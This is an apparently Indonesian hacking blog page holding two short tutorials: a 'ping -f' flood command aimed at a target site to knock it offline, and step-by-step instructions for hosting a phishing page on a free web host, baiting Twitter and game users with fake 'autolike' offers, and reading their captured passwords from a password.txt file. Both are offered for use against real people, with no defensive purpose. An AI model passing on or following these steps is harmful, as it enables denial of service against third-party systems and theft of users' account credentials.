    #sudo ping -f 192.168.1.1
    system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
    Selamat mencoba dan Try With Yout Own Risk.

    you know me ? i'am newbie =))
    jadi newbie itu gampang , tapi susah dijalanin =))
  • Membuat Web Phising

    Baca Sampe Selesai gan !! What-the

    -First Buat akun Idhostinger dloo
    -Kalo udah,langsung ke tab domain,trus buat akun baru
    [Image: 9TTBqrP.png]

    -udah ? beneran ? trus pilih kelola

    << Download Here >>

    download dulu

    kalo lu udh bikin Cari Tulisan Kelola Trus Klik tuh ..
    cari tulisan File Manager 3
    cari tulisan Upload,upload tuh file yang tadi lu download.

    dan saatnya mencari trget,bilang aja kalo itu autolike lah ato apalah,auto follow lah (twitter)

    untuk lihat Hasilnya, Para Gay cukup melihatnya dengan menambahkan Password.txt setelah link sobat! Contoh: http://sitesobat/password.txt

    nb : bisa buat twitter,gemscool,dll
  • Copyright © 2013 - Nisekoi - All Right Reserved

    X ZoneTechno Powered by Blogger - Designed by Johanes Djogan